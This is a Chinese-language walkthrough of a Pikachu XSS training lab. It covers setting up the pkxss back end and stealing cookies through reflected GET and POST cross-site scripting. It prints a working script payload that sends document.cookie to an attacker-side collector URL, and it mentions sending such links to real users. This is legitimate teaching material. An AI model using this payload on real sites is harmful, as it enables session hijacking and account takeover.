攻擊者后台的搭建
首先我們搭建攻擊者后台用於接收我們獲取到的cookie信息,這里我們用的后台是是pikachu自帶的pkxss后台
打開pikachu網址找到管理工具點開xss后台
接着再點擊安裝初始化即
點擊進入首頁,輸入賬號密碼登入就完成了
get型xss:獲取cookie
攻擊流程圖:
這里我的攻擊者服務器受害者服務器和漏洞服務器都為127.0.0.1:801
由於每個攻擊者端口不同,這里我們要修改pkxss后台文件中的xampp\htdocs\pkxss\xcookie下的cookie.php文件
將其中的ip地址修改為漏洞服務器地址
接着再另一個頁面中打開pikachu登入到pkxss的后台
接着開始get型xss的利用,打開pikachu的反射型xss(get)頁面,這里我們准備一個js的payload
<script>document.location='http://127.0.0.1:801/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
這段js代碼利用DOM里面的document.location的實例來做一個重定向,一旦用戶去訪問頁面這段js就會去訪問我們pkxss的后台,訪問時順便把cookie給帶過去
而且利用了DOM里面的document.cookie來獲取本地的cookie(ps:反射型xss(get)輸入框有字符數量限制,之前又說過如果解決)
然后將這段js代碼輸入提交即可
點提交之后頁面跳到了首頁,這時我們已經成功獲取到了用戶的cookie了
然后我們來到之前打開的pkxss頁面,點開cookie搜集刷新一下頁面
在實際場景當中我們可以把這段URL發送給用戶,一旦用戶在瀏覽器里面訪問了這個鏈接,用戶的cookie就會被發送到我們的后台
post型xss:獲取cookie
其實和反射型的xss一樣的,只是提交post方式提交的,並不會在URL里面傳送參數 ,所以我們無法將我們的惡意代碼嵌到URL里面去發送給目標,我們可以在bp里抓包查看一下
攻擊原理流程圖
首先我們點到反射型XSS(post)頁面登入一下
接着pkxss的文件\xampp\htdocs\pkxss\xcookie的post-html中的漏洞服務器器和攻擊者服務器修改成我們的自己的地址
這樣我們這個自動提交post表單的頁面就構造好了
只要我們讓用戶點這個這個我們構造好的會自動提交post請求的表單就可以獲取到用戶cookie
http://127.0.0.1:801/pikachu/pkxss/xcookie/post.html
